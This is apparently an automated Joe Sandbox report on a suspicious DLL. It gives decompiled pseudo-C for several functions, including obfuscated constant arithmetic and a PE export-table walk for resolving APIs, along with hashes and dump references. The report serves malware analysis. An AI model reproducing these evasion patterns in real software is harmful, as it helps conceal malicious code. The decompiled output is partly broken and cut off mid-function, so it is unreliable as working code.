Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: *!$k3
API String ID: 0-1396716965
Opcode ID: 8f8eba84b14ceed61d303627e442c8f100fbf7bf07145fb3e3899d7119dc5625
Instruction ID: 6d0d9ce99f8361b1c70a21909ab84c5c9fe1945b61f43e6735dff05b2bd0c03c
Opcode Fuzzy Hash: 8f8eba84b14ceed61d303627e442c8f100fbf7bf07145fb3e3899d7119dc5625
Instruction Fuzzy Hash: B041BF728083019BD350CF15D84555BFBE0FB98394F124A1DF5D9AB2A0D7B5DA89CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10003938 Relevance: 2.6, Strings: 2, Instructions: 98
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10003938(intOrPtr __ecx, void* __edx) {
				intOrPtr _t84;
				void* _t89;
				void* _t95;
				signed int _t97;
				signed int _t98;
				signed int _t112;
				intOrPtr _t113;
				intOrPtr _t116;
				void* _t117;
				void* _t118;

				_t116 =  *((intOrPtr*)(_t117 + 0x38));
				_push( *((intOrPtr*)(_t117 + 0x44)));
				 *((intOrPtr*)(_t117 + 0x24)) = __ecx;
				_push(_t116);
				_push(__edx);
				_push(__ecx);
				E10012550(__ecx);
				 *((intOrPtr*)(_t117 + 0x44)) = 0x4b2d38;
				_t118 = _t117 + 0x10;
				_t113 = 0;
				 *((intOrPtr*)(_t118 + 0x38)) = 0;
				 *(_t118 + 0x14) = 0x6eb8;
				 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0x7c344bdb;
				_t97 = 0x3d;
				 *(_t118 + 0x18) =  *(_t118 + 0x14) / _t97;
				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x02096a70;
				 *(_t118 + 0x14) = 0xfd73;
				 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0xa1be20cb;
				 *(_t118 + 0x14) =  *(_t118 + 0x14) >> 0xf;
				_t98 = 0x57;
				 *(_t118 + 0x10) =  *(_t118 + 0x14) / _t98;
				 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x00004917;
				 *(_t118 + 0x40) = 0x3423;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) ^ 0xab2a12e8;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) | 0xd17ac73e;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) + 0xffff5f1a;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) ^ 0xfb7a79e5;
				 *(_t118 + 0x1c) = 0x40db;
				 *(_t118 + 0x1c) =  *(_t118 + 0x1c) >> 0xa;
				 *(_t118 + 0x1c) =  *(_t118 + 0x1c) ^ 0x00005dd2;
				 *(_t118 + 0x18) = 0xa0e8;
				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x870d9e5e;
				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x870d3eb6;
				_t84 =  *((intOrPtr*)(_t116 + 0x3c));
				_t112 =  *(_t118 + 0x18);
				 *((intOrPtr*)(_t118 + 0x30)) = _t84;
				_t95 =  *((intOrPtr*)(_t84 + _t116 + 0x78)) + _t116;
				 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t95 + 0x1c)) + _t116;
				_t100 =  *((intOrPtr*)(_t95 + 0x20)) + _t116;
				 *((intOrPtr*)(_t118 + 0x24)) =  *((intOrPtr*)(_t95 + 0x20)) + _t116;
				 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t95 + 0x24)) + _t116;
				while(_t112 <  *((intOrPtr*)(_t95 + 0x18))) {
					_t89 = E10012497( *((intOrPtr*)(_t100 + _t112 * 4)) + _t116,  *((intOrPtr*)(_t118 + 0x24)),  *(_t118 + 0x1c),  *((intOrPtr*)(_t118 + 0x28)),  *((intOrPtr*)(_t118 + 0x44)),  *(_t118 + 0x1c));
					_t118 = _t118 + 0x10;
					if(_t89 == 0) {
						_t113 =  *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x2c)) + ( *( *((intOrPtr*)(_t118 + 0x28)) + _t112 * 2) & 0x0000ffff) * 4)) + _t116;
						if(_t113 >= _t95) {
							_t113 =  <  ? 0 : _t113;
						}
						L7:
						return _t113;
					}
					_t100 =  *((intOrPtr*)(_t118 + 0x24));
					_t112 = _t112 + 1;
				}
				goto L7;
			}

0x1000393d
0x10003945
0x10003949
0x1000394d
0x1000394e
0x1000394f
0x10003950
0x10003955
0x1000395d
0x10003960
0x10003964
0x10003968
0x10003970
0x1000397e
0x10003983
0x10003989
0x10003991
0x10003999
0x100039a1
0x100039aa
0x100039ad
0x100039b1
0x100039b9
0x100039c1
0x100039c9
0x100039d1
0x100039d9
0x100039e1
0x100039e9
0x100039ee
0x100039f6
0x100039fe
0x10003a06
0x10003a0e
0x10003a11
0x10003a15
0x10003a1d
0x10003a27
0x10003a2b
0x10003a32
0x10003a36
0x10003a66
0x10003a55
0x10003a5a
0x10003a5f
0x10003a7c
0x10003a80
0x10003a90
0x10003a90
0x10003a94
0x10003a9c
0x10003a9c
0x10003a61
0x10003a65
0x10003a65
0x00000000

Strings

8-K, xrefs: 10003955
#4, xrefs: 100039B9

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #4$8-K
API String ID: 0-2690090699
Opcode ID: fea5701da5a9700051d942127ae9cea1d7486b1558de5fec2ebc5bc002ed8a6a
Instruction ID: 97594e28dcfab61177e0db979eea073baa63ff0086c12dc770b2f9cc591761f6
Opcode Fuzzy Hash: fea5701da5a9700051d942127ae9cea1d7486b1558de5fec2ebc5bc002ed8a6a
Instruction Fuzzy Hash: 1B4186B16083018FD718CF29C88541BBBF5EF88788F00492EF895A7261D771EA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 1001C192 Relevance: 2.6, Strings: 2, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E1001C192(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v116;
				void* _t95;
				signed int _t104;
				void* _t107;
				intOrPtr _t116;

				_v8 = 0x9f81;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x31dab1ca;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03147ff0;
				_v20 = 0xa808;
				_v20 = _v20 | 0xee8c9d34;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x0ee8e1a4;
				_v40 = 0x98c1;
				_v40 = _v40 + 0xffff69a9;
				_v40 = _v40 ^ 0x000017b7;
				_v36 = 0x182a;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x00005093;
				_v24 = 0xa138;
				_v24 = _v24 + 0x4d23;
				_t104 = 0x57;
				_t116 = _a4;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00001377;
				_v12 = 0x3e71;
				_v12 = _v12 << 3;
				_v12 = _v12 << 4;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00005605;
				_v16 = 0x4dd8;
				_v16 = _v16 | 0x590e6d8f;
				_v16 = _v16 * 0x47;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 ^ 0xa71caf0d;
				_v32 = 0x3ec3;
				_v32 = _v32 << 3;
				_v32 = _v32 | 0x7ba18124;
				_v32 = _v32 ^ 0x7ba1e0dd;
				_v28 = 0xb72f;
				_v28 = _v28 + 0x7494;
				_v28 = _v28 ^ 0xe721bd43;
				_v28 = _v28 ^ 0xe720bd0c;
				_t95 =  *((intOrPtr*)(_t116 + 0x18))( *((intOrPtr*)(_t116 + 8)), 1, 0);
				_t119 = _t95;
				if(_t95 != 0) {
					E10014C37( &_v116, _v8, _v20);
					_pop(_t107);
					_v52 =  &_v116;
					_v48 = E1001A966(_v40, _v36, _t119, _t107, _v24, _v12);
					 *((intOrPtr*)(_t116 + 0x18))( *((intOrPtr*)(_t116 + 8)), 0xa,  &_v52,  &_v44);
					E10010D6D(_v16, _v32, _v28, _v48);
				}
				return 0;
			}

0x1001c198
0x1001c1a1
0x1001c1a5
0x1001c1ac
0x1001c1b0
0x1001c1b7
0x1001c1be
0x1001c1c5
0x1001c1c9
0x1001c1d0
0x1001c1d7
0x1001c1de
0x1001c1e5
0x1001c1ec
0x1001c1f0
0x1001c1f7
0x1001c1fe
0x1001c20b
0x1001c20e
0x1001c211
0x1001c214
0x1001c21b
0x1001c222
0x1001c226
0x1001c22a
0x1001c22e
0x1001c235
0x1001c23c
0x1001c24b
0x1001c252
0x1001c255
0x1001c25c
0x1001c263
0x1001c267
0x1001c26e
0x1001c275
0x1001c27c
0x1001c283
0x1001c28a
0x1001c294
0x1001c297
0x1001c299
0x1001c2a4
0x1001c2aa
0x1001c2ae
0x1001c2ca
0x1001c2d6
0x1001c2e5
0x1001c2eb
0x1001c2f2

Strings

#M, xrefs: 1001C1FE
q>, xrefs: 1001C21B

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #M$q>
API String ID: 0-3778844937
Opcode ID: e014fd25fd94ebfb7f6ea6ba12767a06829e02c2ca803fd4af27c54cc90a2fb3
Instruction ID: b7b03cee95d6c7f69457aa4be071c13a4cfa1822bfb9343300667aa7f0eb8004
Opcode Fuzzy Hash: e014fd25fd94ebfb7f6ea6ba12767a06829e02c2ca803fd4af27c54cc90a2fb3
Instruction Fuzzy Hash: 3441EFB2C0020DABDF19DFA1C94A8EEFBB4FF04304F208559D522B62A0D7B95A45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 10010672 Relevance: 2.6, Strings: 2, Instructions: 73
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10010672(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				void* _t60;
				signed int _t63;
				void* _t65;
				void* _t71;
				void* _t72;
				unsigned int* _t74;

				_t65 = __ecx;
				_t74 =  &_v24;
				_v16 = 0xc222;
				_v16 = _v16 | 0x2c4811a6;
				_v16 = _v16 + 0xffff2ea9;
				_v16 = _v16 ^ 0x2c485227;
				_v4 = 0x52bd;
				_v4 = _v4 ^ 0x701b7809;
				_v4 = _v4 ^ 0x701b4439;
				_v8 = 0x440a;
				_t63 = 0x3c;
				_t71 = 0;
				_v8 = _v8 / _t63;
				_t72 = 0x1db47164;
				_v8 = _v8 ^ 0x0000441a;
				_v24 = 0x7d6d;
				_v24 = _v24 + 0xffffc5c3;
				_v24 = _v24 >> 2;
				_v24 = _v24 + 0xffffb313;
				_v24 = _v24 ^ 0xffffe3d6;
				_v12 = 0x8699;
				_v12 = _v12 + 0xfffff638;
				_v12 = _v12 ^ 0x3f0bf62e;
				_v12 = _v12 ^ 0x3f0bf546;
				_v20 = 0x2aa4;
				_v20 = _v20 + 0xffff16b8;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x5affa7fd;
				do {
					while(_t72 != 0xffebff) {
						if(_t72 == 0x1db47164) {
							_t72 = 0xffebff;
							continue;
						} else {
							if(_t72 != 0x28d16d2c) {
								goto L8;
							} else {
								_t71 = _t71 + E10016B54(_t65 + 4, _v12, _v20);
							}
						}
						L5:
						return _t71;
					}
					_t60 = E10012493();
					_t74 = _t74 - 0xc + 0xc;
					_t72 = 0x28d16d2c;
					_t71 = _t71 + _t60;
					L8:
				} while (_t72 != 0x306bf85d);
				goto L5;
			}

0x10010672
0x10010672
0x10010675
0x1001067f
0x10010687
0x1001068f
0x10010697
0x1001069f
0x100106a7
0x100106af
0x100106c1
0x100106c9
0x100106cb
0x100106cf
0x100106d1
0x100106de
0x100106eb
0x100106f3
0x100106f8
0x10010700
0x10010708
0x10010710
0x10010718
0x10010720
0x10010728
0x10010730
0x10010738
0x10010742
0x10010746
0x1001074e
0x1001074e
0x10010754
0x10010779
0x00000000
0x10010756
0x10010758
0x00000000
0x1001075a
0x1001076d
0x1001076d
0x10010758
0x1001076f
0x10010778
0x10010778
0x10010790
0x10010795
0x10010798
0x1001079a
0x1001079c
0x1001079c
0x00000000

Strings

'RH,, xrefs: 1001068F
m}, xrefs: 100106DE

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'RH,$m}
API String ID: 0-2515829961
Opcode ID: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
Instruction ID: ea727421d02c2da07436c0aad55f047c0b5687294b366c8972c79f074068218f
Opcode Fuzzy Hash: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
Instruction Fuzzy Hash: C6315A729093428BD364DF28E88540BBBE0FBC4754F118A2DF5D5A6260E3B5DA498F93

Uniqueness

Uniqueness Score: -1.00%

Function 10014A9E Relevance: 1.4, Strings: 1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10014A9E(void* __edx, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* __ecx;
				void* _t100;
				intOrPtr _t114;
				signed int _t117;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t142;
				intOrPtr _t143;
				intOrPtr _t147;

				_push(_a16);
				_push(0x10020000);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10012550(_t100);
				_v40 = _v40 & 0x00000000;
				_v44 = 0x156874;
				_v20 = 0x9c2a;
				_v20 = _v20 << 5;
				_t123 = 0x35;
				_v20 = _v20 / _t123;
				_v20 = _v20 ^ 0x00002bb4;
				_v36 = 0xf1e6;
				_v36 = _v36 + 0xffff56d9;
				_v36 = _v36 ^ 0x00000861;
				_v8 = 0x90c5;
				_t124 = 0x75;
				_v8 = _v8 * 0xa;
				_v8 = _v8 ^ 0x847d0871;
				_v8 = _v8 + 0xb0b6;
				_v8 = _v8 ^ 0x847969bf;
				_v32 = 0xdffe;
				_t125 = 0x5f;
				_v32 = _v32 / _t124;
				_v32 = _v32 ^ 0x21a7c3f7;
				_v32 = _v32 ^ 0x21a7f23e;
				_v28 = 0x83e8;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0xeff97ecd;
				_v28 = _v28 ^ 0xeff95885;
				_v16 = 0x2648;
				_v16 = _v16 * 0x3e;
				_t126 = 9;
				_v16 = _v16 / _t125;
				_v16 = _v16 ^ 0x58b3f5ba;
				_v16 = _v16 ^ 0x58b39d5c;
				_v12 = 0x62ef;
				_v12 = _v12 | 0xb941bdbf;
				_v12 = _v12 << 7;
				_v12 = _v12 | 0x29e74872;
				_v12 = _v12 ^ 0xa9ffcd1d;
				_v24 = 0x928c;
				_v24 = _v24 / _t126;
				_v24 = _v24 + 0xb150;
				_v24 = _v24 ^ 0x0000c198;
				_t142 = 0x34;
				_t114 = E100054FB(_t142);
				 *0x1002108c = _t114;
				if(_t114 == 0) {
					L7:
					return 0;
				}
				 *((intOrPtr*)(_t114 + 0x20)) = 0x10020000;
				 *((intOrPtr*)(_t114 + 0x24)) = 0x10020000;
				_t143 =  *0x1002108c;
				_t147 =  *((intOrPtr*)(_t143 + 0x20));
				 *(_t143 + 4) = _v24;
				_t117 =  *(_t143 + 0x14);
				while( *((intOrPtr*)(_t147 + _t117 * 8)) != 0) {
					_t117 = _t117 + 1;
					 *(_t143 + 0x14) = _t117;
				}
				if(E100067EF(_a4, _v8, _v32, _v28) == 0) {
					E1000DE81(_v16,  *0x1002108c, _v12);
					goto L7;
				}
				return 1;
			}

0x10014aa5
0x10014aad
0x10014aae
0x10014ab1
0x10014ab4
0x10014ab6
0x10014abb
0x10014ac1
0x10014ac8
0x10014acf
0x10014ad8
0x10014add
0x10014ae2
0x10014ae9
0x10014af0
0x10014af7
0x10014afe
0x10014b09
0x10014b0c
0x10014b0f
0x10014b16
0x10014b1d
0x10014b24
0x10014b30
0x10014b31
0x10014b36
0x10014b3d
0x10014b44
0x10014b4b
0x10014b4f
0x10014b56
0x10014b5d
0x10014b6a
0x10014b72
0x10014b73
0x10014b78
0x10014b82
0x10014b89
0x10014b90
0x10014b97
0x10014b9b
0x10014ba2
0x10014ba9
0x10014bb7
0x10014bba
0x10014bc1
0x10014bce
0x10014bcf
0x10014bd4
0x10014bdc
0x10014c30
0x00000000
0x10014c30
0x10014bde
0x10014be1
0x10014be7
0x10014bed
0x10014bf0
0x10014bf3
0x10014bfc
0x10014bf8
0x10014bf9
0x10014bf9
0x10014c17
0x10014c2a
0x00000000
0x10014c2f
0x00000000

Strings

rH), xrefs: 10014B9B

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: rH)
API String ID: 0-3429678651
Opcode ID: 31301554ec18ee47c58ed0b0b184940804dcce75a640d804102beef9c6efd4cb
Instruction ID: 7392fe5a62be023d15ac62f108876ec54d88738ecef111b0342360b74a6d152a
Opcode Fuzzy Hash: 31301554ec18ee47c58ed0b0b184940804dcce75a640d804102beef9c6efd4cb
Instruction Fuzzy Hash: 8C514A75D0121AEFEF08CFA4C9865DEBBB1FF44310F218159D415AB2A0DBB99A45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 100147B5 Relevance: 1.4, Strings: 1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E100147B5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v592;
				void* _t127;
				void* _t133;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t127);
				_v68 = _v68 & 0x00000000;
				_v64 = _v64 & 0x00000000;
				_v72 = 0x50be0a;
				_v24 = 0xa904;
				_v24 = _v24 + 0xe5cc;
				_v24 = _v24 ^ 0x597c5b93;
				_push(0x1000142c);
				_v24 = _v24 * 0x54;
				_v24 = _v24 ^ 0x5d49852f;
				_v32 = 0x6077;
				_v32 = _v32 + 0xffffd427;
				_v32 = _v32 + 0x605a;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x253e0470;
				_v16 = 0x766e;
				_v16 = _v16 ^ 0x0e68fc54;
				_v16 = _v16 + 0x5b78;
				_v16 = _v16 + 0xffff6155;
				_v16 = _v16 ^ 0x0e6822fb;
				_v36 = 0x46d0;
				_v36 = _v36 | 0xbf6b54fd;
				_v36 = _v36 >> 4;
				_v36 = _v36 + 0xffffefba;
				_v36 = _v36 ^ 0x0bf6ca05;
				_v60 = 0xe881;
				_v60 = _v60 + 0xb91a;
				_v60 = _v60 ^ 0x0001fd39;
				_v48 = 0xb097;
				_v48 = _v48 ^ 0xf0f26416;
				_v48 = _v48 ^ 0xf0f2a086;
				_v12 = 0xfe0b;
				_v12 = _v12 * 0x6d;
				_v12 = _v12 + 0xe3c7;
				_v12 = _v12 + 0xffff63fe;
				_v12 = _v12 ^ 0x006c422a;
				_v40 = 0xb7e6;
				_v40 = _v40 ^ 0x86f830c6;
				_v40 = _v40 ^ 0x86f8ac5d;
				_v28 = 0xaa43;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0xaa541b7f;
				_v28 = _v28 + 0xffff7b49;
				_v28 = _v28 ^ 0xaa53dcd3;
				_v56 = 0xcf43;
				_v56 = _v56 * 0x49;
				_v56 = _v56 ^ 0x003b1f16;
				_v20 = 0xfc45;
				_v20 = _v20 + 0xffba;
				_v20 = _v20 + 0xaf52;
				_v20 = _v20 >> 0xc;
				_v20 = _v20 ^ 0x00007f51;
				_v52 = 0x343e;
				_v52 = _v52 + 0xffff8ecd;
				_v52 = _v52 ^ 0xffffad90;
				_v44 = 0x9594;
				_v44 = _v44 * 0x28;
				_v44 = _v44 ^ 0x001772e3;
				_v8 = 0x6cd9;
				_v8 = _v8 + 0xffff1db8;
				_v8 = _v8 + 0xffffd279;
				_v8 = _v8 ^ 0xb0257305;
				_v8 = _v8 ^ 0x4fda3672;
				_push(_v36);
				_push(_v16);
				_t133 = E10005DFC(_v24, _v32, _v8);
				E1000ECBD(_v60, _v8, _v24, _v48, _v12,  &_v592, _v40, __edx);
				E10010D6D(_v28, _v56, _v20, _t133);
				return E1000EB1E(_v52, _v44, _v8,  &_v592);
			}

0x100147c0
0x100147c5
0x100147c8
0x100147cb
0x100147cc
0x100147cd
0x100147d2
0x100147d6
0x100147da
0x100147e1
0x100147e8
0x100147ef
0x100147fa
0x100147ff
0x10014802
0x10014809
0x10014810
0x10014817
0x1001481e
0x10014822
0x10014829
0x10014830
0x10014837
0x1001483e
0x10014845
0x1001484c
0x10014853
0x1001485a
0x1001485e
0x10014865
0x1001486c
0x10014873
0x1001487a
0x10014881
0x10014888
0x1001488f
0x10014896
0x100148a1
0x100148a4
0x100148ab
0x100148b2
0x100148b9
0x100148c0
0x100148c7
0x100148ce
0x100148d5
0x100148d9
0x100148e0
0x100148e7
0x100148ee
0x100148f9
0x100148fc
0x10014903
0x1001490a
0x10014911
0x10014918
0x1001491c
0x10014923
0x1001492a
0x10014931
0x10014938
0x10014943
0x10014946
0x1001494d
0x10014954
0x1001495b
0x10014962
0x10014969
0x10014970
0x10014973
0x1001497c
0x1001499d
0x100149ac
0x100149ce

Strings

*Bl, xrefs: 100148B2

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: *Bl
API String ID: 0-1288706768
Opcode ID: 3e931690241696f15d2dfdae9ac50aee2e1ab199036737b52f4c733f1c1d13a8
Instruction ID: 78fd7083e1e2d60512852b52fc25e9251cdf364ad576f2c0b532841f8c2538fc
Opcode Fuzzy Hash: 3e931690241696f15d2dfdae9ac50aee2e1ab199036737b52f4c733f1c1d13a8
Instruction Fuzzy Hash: CE51FFB1C0130EABDF54CFE5D98A8EEBBB1FB48314F208158E515762A0D3B95A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10012631 Relevance: 1.3, Strings: 1, Instructions: 91
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10012631(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _t92;
				signed int _t109;
				signed int _t110;
				void* _t119;
				signed int _t120;
				void* _t123;

				_t123 = __eflags;
				_push(_a8);
				_t119 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t92);
				_v44 = _v44 & 0x00000000;
				_v56 = 0x428c97;
				_v52 = 0x699918;
				_v48 = 0x4b9b3f;
				_v16 = 0x691;
				_t109 = 0x25;
				_v16 = _v16 * 0x4b;
				_v16 = _v16 * 0x44;
				_v16 = _v16 ^ 0x0082d99d;
				_v24 = 0xda4d;
				_v24 = _v24 >> 2;
				_v24 = _v24 + 0xa7aa;
				_v24 = _v24 ^ 0x00009b39;
				_v20 = 0x8ab8;
				_v20 = _v20 + 0xbc5;
				_v20 = _v20 + 0x8be6;
				_v20 = _v20 ^ 0x00013aa9;
				_v12 = 0x3e92;
				_v12 = _v12 * 0x48;
				_v12 = _v12 + 0xffff6b24;
				_v12 = _v12 | 0xd8f0c2a4;
				_v12 = _v12 ^ 0xd8f1a727;
				_v36 = 0x20a;
				_v36 = _v36 ^ 0x637f1cbb;
				_v36 = _v36 ^ 0x637f1131;
				_v8 = 0x38cb;
				_v8 = _v8 ^ 0x7b367a31;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t109;
				_v8 = _v8 ^ 0x06a897b6;
				_v28 = 0xa730;
				_v28 = _v28 << 5;
				_v28 = _v28 + 0x5f1e;
				_v28 = _v28 ^ 0x00154d8c;
				_v40 = E1000A156();
				_v32 = 0xde76;
				_v32 = _v32 + 0x8a52;
				_v32 = _v32 ^ 0x000168cc;
				_v16 = 0x1d5e;
				_t110 = 7;
				_v16 = _v16 / _t110;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x00000053;
				_t120 = E1000DF8A(_t110, _v16 % _t110, _t123, _v16, _v32);
				E10019A27( &_v40, 1, _v12, _t120, _t119, _v36, _v8, _v28);
				 *((short*)(_t119 + _t120 * 2)) = 0;
				return 0;
			}

0x10012631
0x10012639
0x1001263c
0x1001263e
0x10012641
0x10012642
0x10012643
0x10012648
0x1001264e
0x10012655
0x1001265c
0x10012663
0x10012670
0x10012671
0x10012678
0x1001267b
0x10012682
0x10012689
0x1001268d
0x10012694
0x1001269b
0x100126a2
0x100126a9
0x100126b0
0x100126b7
0x100126c2
0x100126c5
0x100126cc
0x100126d3
0x100126da
0x100126e1
0x100126e8
0x100126ef
0x100126f6
0x100126fd
0x10012705
0x10012708
0x1001270f
0x10012716
0x1001271a
0x10012721
0x10012730
0x10012735
0x1001273c
0x10012743
0x1001274a
0x10012756
0x10012759
0x1001275c
0x10012760
0x10012778
0x1001278b
0x10012795
0x1001279e

Strings

1z6{, xrefs: 100126F6

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1z6{
API String ID: 0-2122224799
Opcode ID: ba165720bb9331fcc9edb768f8659e2843ce2937904f7b6f9b2030632d0d4806
Instruction ID: 132fa155c210bc4c203d3cc477c86db9d93b1d6b151bb900ec9f261ed96595aa
Opcode Fuzzy Hash: ba165720bb9331fcc9edb768f8659e2843ce2937904f7b6f9b2030632d0d4806
Instruction Fuzzy Hash: BC41FEB1D00209EBEB04CFA5C94A5EEBBB1FB84308F108199E425B6250D7B94B55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A966 Relevance: 1.3, Strings: 1, Instructions: 88
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E1001A966(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t38;
				signed int _t42;
				signed int _t48;
				signed int* _t51;
				signed int _t53;
				void* _t60;
				signed int _t64;
				signed int _t65;
				void* _t71;
				intOrPtr _t72;
				signed int* _t74;
				unsigned int _t77;
				signed int _t80;

				_t51 = _a16;
				_push(_t51);
				_push(_a12);
				_push(_a8);
				_push(0x100010ec);
				_push(__edx);
				_t38 = E10012550(0x100010ec);
				_push(_t51);
				_push(_t38);
				E10012550(_t38);
				_v12 = 0x4b1aac;
				_t72 = 0;
				_v8 = 0x6e8720;
				_v4 = 0;
				_v28 = 0x88f3;
				_v28 = _v28 >> 2;
				_v28 = _v28 ^ 0x975e54be;
				_v28 = _v28 + 0xe7d8;
				_v28 = _v28 ^ 0x975f6258;
				_v24 = 0xe148;
				_t53 = 0x36;
				_v24 = _v24 / _t53;
				_v24 = _v24 ^ 0x00006f46;
				_t42 =  *0x100010ec; // 0x7d7b62b8
